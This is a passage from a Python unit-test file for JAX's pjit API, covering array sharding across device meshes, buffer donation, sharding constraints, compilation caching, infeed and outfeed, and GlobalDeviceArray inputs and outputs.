    y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
    actual = f(x, y)
    expected = x @ y
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 4)

    # Output is sharded over 'x' only, so buffer pairs hold the same half.
    split0, split1 = np.split(expected, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), split0,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[1].to_py(), split0,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[2].to_py(), split1,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[3].to_py(), split1,
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testTwoMeshAxisSharding(self):

    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    actual = f(x, x + 1)
    expected = x @ (x + 1)
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 4)

    splits = np.split(expected, 4)
    self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2)])
  def testBufferDonation(self):

    @partial(pjit,
             in_axis_resources=P('x'),
             out_axis_resources=P('x'),
             donate_argnums=0)
    def f(x, y):
      return x + y

    shard = pjit(lambda x: x, in_axis_resources=P('x'),
                 out_axis_resources=P('x'))
    x = shard(jnp.ones((2, 5)) * 4)
    y = shard(jnp.ones((2, 5)) * 2)
    expected = x + y
    self.assertAllClose(f(x, y), expected)
    # Only argnum 0 was donated.
    self.assertNotDeleted(y)
    self.assertDeleted(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testShardingConstraint(self):

    @partial(pjit, in_axis_resources=None, out_axis_resources=None)
    def f(x):
      y = x + 1
      y = with_sharding_constraint(y, P('x', 'y'))
      return y * 2

    shape = (8, 8)
    x = np.arange(prod(shape)).reshape(shape)
    expected = (x + 1) * 2
    actual = f(x)
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), expected,
                        check_dtypes=False)

    hlo = jax.xla_computation(f)(np.ones(shape))
    # Annotation from with_sharding_constraint
    self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
    # Annotation from pjit
    self.assertIn("sharding={replicated}", hlo.as_hlo_text())

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testShardingConstraintPyTree(self):

    @partial(pjit, in_axis_resources=None, out_axis_resources=None)
    def f(x):
      x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
      x = x.copy()
      x[0]["a"] *= 2
      return x

    shape = (8, 8)
    v = np.arange(prod(shape)).reshape(shape)
    x = [{"a": v, "b": v * 2}, v * 3]
    actual = f(x)

    expected = x.copy()
    expected[0]["a"] *= 2
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertLen(actual[0]["a"].device_buffers, 2)

    hlo = jax.xla_computation(f)(x)
    # Annotations from with_sharding_constraint
    self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
    self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
    # Annotation from pjit
    self.assertIn("sharding={replicated}", hlo.as_hlo_text())

  def testCaching(self):
    def f(x):
      assert should_be_tracing
      return jnp.sin(x) * 2

    x = np.arange(16).reshape(4, 4)
    devices = np.array(list(jax.local_devices())[:4])
    if devices.size < 4:
      raise unittest.SkipTest("Test requires 4 devices")
    devices = devices.reshape((2, 2))
    with mesh(devices, ('x', 'y')):
      should_be_tracing = True
      pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
      should_be_tracing = False
      pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
    # Re-create the mesh to make sure that has no influence on caching
    with mesh(devices, ('x', 'y')):
      should_be_tracing = False
      pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testNested(self):
    # Add a constant captured by the nested pjit to make things more complicated
    h = jnp.arange(4)
    f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
    g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
    x = jnp.arange(16).reshape((4, 4))
    y = g(x)
    self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
    self.assertTrue(hasattr(y, "sharding_spec"))

  @check_1d_2d_mesh(set_mesh=True)
  def testAutodiff(self, mesh, resources):
    if len(mesh) != 2: return
    assert resources == ('x', 'y')
    # Add a constant captured by the nested pjit to make things more complicated
    h = jnp.arange(4)
    f = pjit(lambda x: x.sum(1) * h.sum(),
             in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
    g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
             in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
    jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
                    order=2)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testEvalJaxpr(self):
    x, y = jnp.arange(4), jnp.arange(5)
    f = pjit(lambda x, y: x.sum() + jnp.sin(y),
             in_axis_resources=(P('x'), P('y')),
             out_axis_resources=P('y'))
    f_jaxpr = jax.make_jaxpr(f)(x, y)
    f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
    r, = f_eval(x, y)
    self.assertAllClose(r, x.sum() + jnp.sin(y))

  @jtu.with_mesh([('x', 2)])
  def testNonArrayArg(self):
    self.assertEqual(pjit(lambda x: x + 2,
                          in_axis_resources=None,
                          out_axis_resources=None)(1), 3)

  @jtu.with_mesh([('x', 2)])
  def testNonHashableAxisResources(self):
    x = jnp.arange(4)
    y = pjit(lambda x: {'b': x['a'] + 2},
             in_axis_resources=({'a': P('x')},),
             out_axis_resources={'b': P('x')})({'a': x})
    self.assertAllClose(y, {'b': x + 2})

  @jtu.with_mesh([('x', 2)])
  def testGradOfConstraint(self):
    # TODO(b/213927860): XLA incorrectly simplifies away the sharding constraint
    # on the output.
    if config.jax_enable_mlir:
      raise unittest.SkipTest("test fails with jax_enable_mlir")
    # Make sure that we can compute grads through sharding constraints
    h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
    f = pjit(lambda x: jax.grad(h)(x),
             in_axis_resources=None, out_axis_resources=None)
    x = jnp.arange(8, dtype=jnp.float32)
    self.assertAllClose(f(x), jnp.cos(x))

  @jtu.with_mesh([('x', 2)])
  def testNoopPartitionSpecs(self):
    noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
    x = jnp.arange(8).reshape((2, 2, 2))
    for spec in noops:
      y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
      self.assertAllClose(y, x * 2)

  @jtu.with_mesh([('x', 2)])
  def testVmapModifiesAxisResources(self):
    h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
    x = jnp.arange(4)
    y = jnp.arange(5*4).reshape((5, 4))
    jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
    eqn = jaxpr.eqns[0]
    self.assertIs(eqn.primitive, pjit_p)
    x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
    self.assertEqual(x_sync, SpecSync.IN_SYNC)
    self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
    x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
    self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
    self.assertEqual(y_sync, SpecSync.IN_SYNC)
    self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)

  @jtu.with_mesh([('x', 2)])
  def testVMap(self):
    f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
    x = jnp.arange(4)
    y = jnp.arange(5*4).reshape((5, 4))
    z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
    self.assertAllClose(z, x + y)
    self.assertAllClose(w, x)
    self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
    self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))

  @jtu.with_mesh([('x', 2)])
  def testVMapShardingConstraint(self):
    f = pjit(lambda x: with_sharding_constraint(x, P('x')),
             in_axis_resources=P(), out_axis_resources=P('x'))
    x = jnp.arange(5*4).reshape((5, 4))
    jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
    pjit_eqn, = jaxpr.eqns
    constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
    self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
    self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testShardingInXMap(self):
    h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
    f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
             axis_resources={'i': 'y'})
    x = jnp.arange(16).reshape((4, 4))
    rule = xla._translations[pjit_p]
    test_rule_called = False
    def _test_rule(*args, **kwargs):
      nonlocal test_rule_called
      test_rule_called = True
      in_axis_resources = kwargs['in_axis_resources']
      self.assertEqual(len(in_axis_resources), 1)
      self.assertIn(('y',), in_axis_resources[0].partitions)
      return rule(*args, **kwargs)
    try:
      # Swap in the instrumented translation rule; always restore it.
      xla._translations[pjit_p] = _test_rule
      f(x)
      self.assertTrue(test_rule_called)
    finally:
      xla._translations[pjit_p] = rule

  @jtu.with_mesh([('x', 2)])
  def testLowerWithDuckTyping(self):
    x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
    # Make sure this doesn't crash
    pjit(lambda x: x + 4,
         in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)

  @jtu.with_mesh([('x', 2)])
  def testLowerDonateArgnumsAvailable(self):
    x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
    def f(*args):
      x, *_ = args
      return x
    f_low = pjit(f, donate_argnums=(0,),
                 in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
    f_com = f_low.compile()
    # Fixed: the original was a bare `==` chain whose result was discarded,
    # so nothing was actually checked. Assert donate_argnums survive both
    # lowering and compilation.
    self.assertEqual(f_low.donate_argnums, (0,))
    self.assertEqual(f_com.donate_argnums, (0,))

  def testInfeed(self):
    devices = np.array(jax.local_devices())
    nr_devices = len(devices)
    shape = (nr_devices * 3, nr_devices * 5)

    def f_for_jit(x):
      token = lax.create_token(x)
      (y,), token = lax.infeed(
          token, shape=(jax.ShapedArray(x.shape, np.float32),))
      (z,), token = lax.infeed(
          token, shape=(jax.ShapedArray(x.shape, np.float32),))
      (w,), token = lax.infeed(
          token, shape=(jax.ShapedArray(x.shape, np.float32),))
      return x + y + z + w

    x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
    y = x * 2.
    z = x * 3.
    w = x * 4.

    # Transfer data to infeed before executing the function. For GPUs, the
    # execution of the compiled function is blocking, so transferring data
    # to infeed before executing ensures that the execution does not deadlock
    # waiting for the infeed data.
    logging.info('Transfering to infeed for the jit call')
    d = devices[0]
    d.transfer_to_infeed((y,))
    d.transfer_to_infeed((z,))
    d.transfer_to_infeed((w,))

    # JIT
    logging.info('Making jit call')
    res0 = jax.jit(f_for_jit)(x)
    self.assertAllClose(res0, x + y + z + w, check_dtypes=True)

    # PJIT
    def f_for_pjit(x):
      token = lax.create_token(x)
      # A replicated infeed
      (y,), token = lax.infeed(
          token,
          shape=(jax.ShapedArray(x.shape, np.float32),),
          partitions=(None,))
      # An infeed sharded on first axis
      (z,), token = lax.infeed(
          token,
          shape=(jax.ShapedArray(x.shape, np.float32),),
          partitions=(P(nr_devices, 1),))
      # An infeed sharded on second axis
      (w,), token = lax.infeed(
          token,
          shape=(jax.ShapedArray(x.shape, np.float32),),
          partitions=(P(1, nr_devices),))
      return x + y + z + w

    logging.info('Transfering to infeed for the pjit call')
    for didx, d in enumerate(devices):
      # Transfer the whole array to all devices for replicated.
      d.transfer_to_infeed((y,))
      # For sharded infeed, transfer only the needed slices to each device.
      # NOTE(review): the z transfer passes a bare array (parens only, no
      # trailing comma) while y and w are passed as 1-tuples — presumably
      # transfer_to_infeed accepts both; confirm before "fixing".
      d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
      d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))

    with mesh(devices, ['d']):
      logging.info('Making pjit call')
      res = pjit(
          f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
              x)

    self.assertAllClose(res0, res, check_dtypes=True)

  def testOutfeed(self):
    devices = np.array(jax.local_devices())
    nr_devices = len(devices)
    shape = (nr_devices * 3, nr_devices * 5)

    def f(x):
      token = lax.create_token(x)
      token = lax.outfeed(token, x, partitions=(None,))
      token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
      token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
      return x

    x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)

    def dispatch():
      with mesh(devices, ['d']):
        logging.info('Making pjit call')
        pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
    # Dispatch on a thread so the main thread can drain the outfeed,
    # otherwise both sides would block on each other.
    execution = threading.Thread(target=dispatch)
    execution.start()

    def check_outfeed(d, x):
      y, = d.transfer_from_outfeed(
          xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
      self.assertAllClose(x, y, check_dtypes=True)

    logging.info('Transfering from outfeed for the pjit call')
    for didx, d in enumerate(devices):
      # Transfer the whole array from all devices for replicated.
      check_outfeed(d, x)
      # For sharded outfeed, the results are sliced.
      check_outfeed(d, x[3 * didx:3 * didx + 3, :])
      check_outfeed(d, x[:, 5 * didx:5 * didx + 5])

    execution.join()

  @jtu.with_mesh([('x', 2)])
  def testWithCustomPRNGKey(self):
    if not config.jax_enable_custom_prng:
      raise unittest.SkipTest("test requires jax_enable_custom_prng")
    key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
    # Make sure this doesn't crash
    pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompile(self):
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    expected = x @ (x + 1)

    exe = f.lower(x, x + 1).compile()
    actual = exe(x, x + 1)

    splits = np.split(expected, 4)
    self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileWithKwargs(self):
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y, **kwargs):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    exe = f.lower(x, x + 1).compile()

    self.assertRaisesRegex(
        NotImplementedError,
        "function was compiled by a transformation that does not support "
        "keyword arguments, but called with keyword arguments: a, b",
        lambda: exe(x, x + 1, a=1, b=2))

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileInTreeMismatch(self):
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    exe = f.lower(x, x + 1).compile()

    self.assertRaisesRegex(
        TypeError, "function compiled for .*, called with .*",
        lambda: exe([x], [x + 1]))

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileArgTypeMismatch(self):
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    x_f32 = x.astype(jnp.float32)
    x_i32 = x.astype(jnp.int32)
    exe = f.lower(x_f32, x_f32).compile()
    self.assertRaisesRegex(
        TypeError,
        "Computation compiled for input types:\n.*float32.*\n"
        "called with:\n.*int32.*",
        lambda: exe(x_i32, x_i32))
class GDAPjitTest(jtu.JaxTestCase):
  """Tests for pjit interoperating with GlobalDeviceArray (GDA) inputs/outputs."""

  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_single_output(self):
    global_mesh = create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = P('x', 'y')
    input_data = np.arange(
        prod(global_input_shape)).reshape(global_input_shape)
    def cb(index):
      return input_data[index]
    gda_obj = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes, cb)

    with jax._src.config.parallel_functions_output_gda(True):
      @partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
      def f(x):
        return x @ x.T
      expected_matrix_mul = input_data @ input_data.T

      out = f(gda_obj)
      self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
      self.assertEqual(out.shape, (8, 8))
      self.assertEqual(out.local_shards[0].data.shape, (2, 4))
      self.assertDictEqual(out._global_mesh.shape, {'x': 4, 'y': 2})
      for s in out.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

      # A GDA output can be fed straight back in as a GDA input.
      out2 = f(out)
      self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)

      # Plain ndarrays must not be passed where FROM_GDA is specified.
      with self.assertRaisesRegex(
          ValueError, ('For a non-GDA input, the corresponding resource in '
                       'in_axis_resources cannot be `pjit.FROM_GDA`.')):
        f(input_data)

  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_multi_input_multi_output(self):
    global_mesh = create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    input_data = np.arange(
        prod(global_input_shape)).reshape(global_input_shape)
    def cb(index):
      return input_data[index]

    # Four GDAs with different partitionings of the same data.
    mesh_axes1 = P('x', 'y')
    gda1 = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes1, cb)
    mesh_axes2 = P('x')
    gda2 = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes2, cb)
    mesh_axes3 = P(('x', 'y'))
    gda3 = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes3, cb)
    mesh_axes4 = P(None)
    gda4 = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes4, cb)

    with jax._src.config.parallel_functions_output_gda(True):
      @partial(
          pjit,
          # `FROM_GDA` will be replicated for all the inputs.
          in_axis_resources=FROM_GDA,
          out_axis_resources=(mesh_axes1, mesh_axes4, mesh_axes2, mesh_axes3))
      def f(x, y, z, a):
        return x @ x.T, y, z, a
      out1, out2, out3, out4 = f(gda1, gda2, gda3, gda4)

      self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
      self.assertEqual(out1.shape, (8, 8))
      self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
      self.assertEqual(out1.local_shards[0].index, (slice(0, 2), slice(0, 4)))
      self.assertEqual(out1.local_shards[1].index, (slice(0, 2), slice(4, 8)))
      self.assertListEqual([s.replica_id for s in out1.local_shards],
                           [0, 0, 0, 0, 0, 0, 0, 0])
      expected_matrix_mul = input_data @ input_data.T
      for s in out1.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

      # out2 is fully replicated (P(None)): each device holds the whole array.
      self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
      self.assertEqual(out2.shape, (8, 2))
      self.assertEqual(out2.local_shards[0].data.shape, (8, 2))
      self.assertEqual(out2.local_shards[0].index, (slice(None), slice(None)))
      self.assertEqual(out2.local_shards[1].index, (slice(None), slice(None)))
      self.assertListEqual([s.replica_id for s in out2.local_shards],
                           [0, 1, 2, 3, 4, 5, 6, 7])
      for s in out2.local_shards:
        self.assertArraysEqual(s.data, input_data)

      # out3 is sharded over 'x' only, replicated over 'y'.
      self.assertIsInstance(out3, global_device_array.GlobalDeviceArray)
      self.assertEqual(out3.shape, (8, 2))
      self.assertEqual(out3.local_shards[0].data.shape, (2, 2))
      self.assertEqual(out3.local_shards[0].index, (slice(0, 2), slice(None)))
      self.assertEqual(out3.local_shards[1].index, (slice(0, 2), slice(None)))
      self.assertListEqual([s.replica_id for s in out3.local_shards],
                           [0, 1, 0, 1, 0, 1, 0, 1])
      for s in out3.local_shards:
        self.assertArraysEqual(s.data, input_data[s.index])

      # out4 is sharded over both axes combined: 8 single-row shards.
      self.assertIsInstance(out4, global_device_array.GlobalDeviceArray)
      self.assertEqual(out4.shape, (8, 2))
      self.assertEqual(out4.local_shards[0].data.shape, (1, 2))
      self.assertEqual(out4.local_shards[0].index, (slice(0, 1), slice(None)))
      self.assertEqual(out4.local_shards[1].index, (slice(1, 2), slice(None)))
      self.assertListEqual([s.replica_id for s in out4.local_shards],
                           [0, 0, 0, 0, 0, 0, 0, 0])
      for s in out4.local_shards:
        self.assertArraysEqual(s.data, input_data[s.index])

  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_mixed_inputs(self):
    # One GDA argument (via FROM_GDA) plus one plain ndarray argument.
    global_mesh = create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = P('x', 'y')
    input_data = np.arange(
        prod(global_input_shape)).reshape(global_input_shape)
    def cb(index):
      return input_data[index]
    gda_obj = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes, cb)

    with jax._src.config.parallel_functions_output_gda(True):
      @partial(pjit,
               in_axis_resources=(FROM_GDA, P('x', 'y')),
               out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
      def f(x, y):
        return x @ x.T, y @ y.T
      expected_matrix_mul = input_data @ input_data.T

      out1, out2 = f(gda_obj, input_data)
      self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
      self.assertEqual(out1.shape, (8, 8))
      self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
      self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
      for s in out1.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

      self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
      self.assertEqual(out2.shape, (8, 8))
      self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
      self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
      for s in out2.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_non_gda_inputs(self):
    # GDA output mode still works when no input is a GDA.
    input_shape = (8, 2)
    input_data = np.arange(prod(input_shape)).reshape(input_shape)

    with jax._src.config.parallel_functions_output_gda(True):
      @partial(pjit,
               in_axis_resources=(None, P('x', 'y')),
               out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
      def f(x, y):
        return x @ x.T, y @ y.T

      expected_matrix_mul = input_data @ input_data.T
      out1, out2 = f(input_data, input_data)

      self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
      self.assertEqual(out1.shape, (8, 8))
      self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
      self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
      for s in out1.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

      self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
      self.assertEqual(out2.shape, (8, 8))
      self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
      self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
      for s in out2.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def test_pjit_gda_mesh_mismatch(self):
    # The GDA is built on a 4x2 mesh while pjit runs under a 2x2 mesh.
    global_mesh = create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = ['x', 'y']
    global_input_data = np.arange(
        prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
    def cb(index):
      return global_input_data[index]
    gda_obj = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes, cb)

    with self.assertRaisesRegex(ValueError,
                                "Pjit's mesh and GDA's mesh should be equal."):
      @partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
      def f(x):
        return x
      f(gda_obj)

  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_wrong_resource_for_gda_input(self):
    global_mesh = create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = ['x']
    global_input_data = np.arange(
        prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
    def cb(index):
      return global_input_data[index]
    gda_obj = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes, cb)

    # GDA partitioned over 'x' only, but pjit asks for ('x', 'y'): error.
    with self.assertRaisesWithLiteralMatch(
        ValueError,
        "Got an input GDA to pjit with different partitioning than specified "
        'in the in_axis_resources argument to pjit. The partitioning must '
        'match, or use `jax.experimental.pjit.FROM_GDA` in `in_axis_resources`. '
        "Got GDA spec: PartitionSpec('x',) and "
        "pjit spec: PartitionSpec('x', 'y') "
        'for GDA: GlobalDeviceArray(shape=(8, 2), dtype=float32)'):
      @partial(pjit, in_axis_resources=P('x', 'y'), out_axis_resources=P('x', 'y'))
      def f(x):
        return x
      f(gda_obj)

  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_caching(self):
    global_mesh = create_global_mesh((4, 2), ('x', 'y'))
    input_shape = (8, 2)
    mesh_axes = P('x', 'y')
    input_data = np.arange(
        prod(input_shape), dtype=np.float32).reshape(input_shape)
    def cb(index):
      return input_data[index]

    gda_obj = global_device_array.GlobalDeviceArray.from_callback(
        input_shape, global_mesh, mesh_axes, cb)

    trace_counter = [0]
    @partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=P('x', 'y'))
    def f(x, y):
      trace_counter[0] += 1
      return x @ y.T

    # Identical (GDA, GDA) call signatures hit the trace cache...
    f(gda_obj, gda_obj)
    self.assertListEqual(trace_counter, [1])
    f(gda_obj, gda_obj)
    self.assertListEqual(trace_counter, [1])
    # ...while ndarray and mixed signatures each trigger a retrace.
    f(input_data, input_data)
    self.assertListEqual(trace_counter, [2])
    f(gda_obj, input_data)
    self.assertListEqual(trace_counter, [3])

  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_partition_spec_mismatch_semantically_equivalent(self):
    global_mesh = create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = [None]
    global_input_data = np.arange(
        prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)

    def cb(index):
      return global_input_data[index]

    with jax._src.config.parallel_functions_output_gda(True):
      gda_obj = global_device_array.GlobalDeviceArray.from_callback(
          global_input_shape, global_mesh, mesh_axes, cb)

      @partial(pjit, in_axis_resources=P(None), out_axis_resources=P(None))
      def f(x):
        return x

      output_gda = f(gda_obj)
      # Ensure output_gda._mesh_axes = P() is matched with P(None).
      self.assertEqual(output_gda._mesh_axes, ())
      # P(None) is in_axis_resources.
      f(output_gda)

  def test_from_gda_duplicates(self):
    global_mesh = create_global_mesh((1, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = ['x', 'y']
    input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)

    # It's occasionally possible to end up with two FROM_GDA singletons (e.g. if
    # pickling in_axis_resources and sending to other processes). Make sure
    # this doesn't cause an error to avoid user confusion.
    from_gda_dup = pjit_lib._FromGdaSingleton()
    with mesh(global_mesh.devices, global_mesh.axis_names):
      pjit(lambda x: x, in_axis_resources=from_gda_dup, out_axis_resources=None)(
          input_gda)

  def test_no_recompilation_due_to_in_axis_resources(self):
    global_mesh = create_global_mesh((1, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = P(None,)
    input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)

    with jax._src.config.parallel_functions_output_gda(True):
      @partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=mesh_axes)
      def f(x):
        return x

      with mesh(global_mesh.devices, global_mesh.axis_names):
        out_gda = f(input_gda)
        self.assertEqual(out_gda._mesh_axes, ())

        # Feeding the output back in must be a lowering-cache hit, not a miss.
        before_cache = pjit_lib._pjit_lower.cache_info()
        f(out_gda)
        after_cache = pjit_lib._pjit_lower.cache_info()

        self.assertNotEqual(id(before_cache), id(after_cache))
        self.assertEqual(before_cache.hits + 1, after_cache.hits)
        self.assertEqual(before_cache.misses, after_cache.misses)
def spec_regex(s):
